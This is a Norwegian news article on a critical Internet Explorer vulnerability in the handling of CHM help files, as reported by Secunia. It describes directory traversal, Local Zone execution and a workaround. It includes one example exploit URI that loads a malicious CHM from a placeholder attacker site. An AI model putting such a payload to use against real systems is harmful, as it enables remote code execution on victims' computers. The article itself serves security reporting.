Alvorligere sikkerhetshull i Internet Explorer

Et lenge kjent sikkerhetshull i Internet Explorer blir nå ansett som enda mer alvorlig enn tidligere.

Sikkerhetsselskapet Secunia har gitt et kjent sikkerhetshull i Internet Explorer alvorlighetsgraden "Meget Kritisk" etter at nye detaljer er blitt kjent.

Sikkerhetshullet, som Secunia først omtalte i begynnelsen av januar i år, gjør det mulig for ondsinnede å få økt tilgang til et sårbart system via Internett.

Eksterne og lokalt installerte "CHM"-filer, den filtypen som den innebygde hjelpen i mye programvare er lagret som, kan åpnes av nettsteder enten ved hjelp av "showHelp"-funksjonen eller URI-handlere som "ms-its:" og "mk:@MSITStore:". Normalt er det ifølge Secunia ikke noe problem at Internet Explorer tillater nettsteder å åpne lokalt installerte CHM-filer, siden de betraktes som filer man har tillitt til.

Det finnes dog to problemer med håndteringen av CHM-filer.

  1. Det er mulig å behandle andre lokale filer som CHM-filer ved å benytte en spesiell syntaks som inkluderer et dobbelt semikolon i slutten av filnavnet, kombinert med katalog-traversering ved hjelp av tegnene "..//".

    Dette kan utnyttes via programvare som WinAmp, Flash Player, XMLHTTP og ADODB stream, som gjør det mulig å plassere filer med vilkårlig innhold på en kjent plassering på brukerens system.

  2. Filer som ikke er lokalt installert, kan fortsatt eksekvere vilkårlig kode assosiert med sikkerhetssonen "Local Zone" ved å referere til en ikke-eksisterende fil

Et eksempel på det hvordan dette kan utnyttes:

ms-its:mhtml:file://C:\eksisterer_ikke.mhtml!http://[ondsindet_site] //ondsindet.chm::/ond.html

Sårbarheten kan utnyttes i alle utgaver av Internet Explorer. Det er ikke kjent hva Microsofts planer er for å løse problemet.

Som en midlertidig løsning foreslår Secunia at filassosieringen for CHM-filer fjernes. Men dette vil også føre til at Windows Hjelp deaktiveres.

Til toppen